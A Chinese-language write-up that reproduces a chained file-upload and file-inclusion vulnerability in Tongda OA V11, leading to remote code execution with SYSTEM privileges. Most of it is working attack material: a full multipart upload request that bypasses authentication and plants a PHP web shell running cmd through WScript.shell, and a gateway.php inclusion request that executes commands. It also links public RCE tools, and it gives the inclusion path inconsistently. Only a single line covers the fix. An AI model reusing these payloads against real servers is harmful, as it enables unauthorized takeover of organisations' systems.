通達OA文件上傳+文件包含漏洞復現
0x00 漏洞簡述
該漏洞在繞過身份驗證的情況下通過文件上傳漏洞上傳惡意php文件,組合文件包含漏洞最終造成遠程代碼執行漏洞,從而導致可以控制服務器system權限。
0x01 漏洞分析
在通達OA上傳漏洞中,上傳文件upload.php文件中存在一個$p參數,如果$p非空就可以跳過auth.php驗證機制,話不多說直接上源碼:
文件包含漏洞存在於geteway.php文件中,可直接包含url
0x02 漏洞復現
下載安裝通達OA並訪問
訪問上傳目錄,我使用的是V11版本,路徑為:ispirit/im/upload.php
Burp抓包構造數據包上傳文件,POC為:
POST /ispirit/im/upload.php HTTP/1.1 Host: 192.168.1.106 Content-Length: 658 Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5 Cookie: PHPSESSID=123 Connection: close ------WebKitFormBoundarypyfBh1YB4pV8McGB Content-Disposition: form-data; name="UPLOAD_MODE" 2 ------WebKitFormBoundarypyfBh1YB4pV8McGB Content-Disposition: form-data; name="P" 123 ------WebKitFormBoundarypyfBh1YB4pV8McGB Content-Disposition: form-data; name="DEST_UID" 1 ------WebKitFormBoundarypyfBh1YB4pV8McGB Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg" Content-Type: image/jpeg <?php $command=$_POST['cmd']; $wsh = new COM('WScript.shell'); $exec = $wsh->exec("cmd /c ".$command); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> ------WebKitFormBoundarypyfBh1YB4pV8McGB--
發送poc
上傳成功;上傳成功后訪問文件包含路徑/ispirit/interface/geteway.php
burp抓包構造數據包:
POST /mac/gateway.php HTTP/1.1 Host: 10.10.20.116:88(根據自己的IP而定) Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.21.0 Content-Length: 69 Content-Type: application/x-www-form-urlencoded json={"url":"/general/../../attach/im/2003/941633647.jpg"}&cmd=whoami
發送指令可發現命令執行成功:
也可以使用POC工具
https://github.com/M4tir/tongda-oa-tools
https://github.com/fuhei/tongda_rce
0x03 修復建議
更新官方補丁。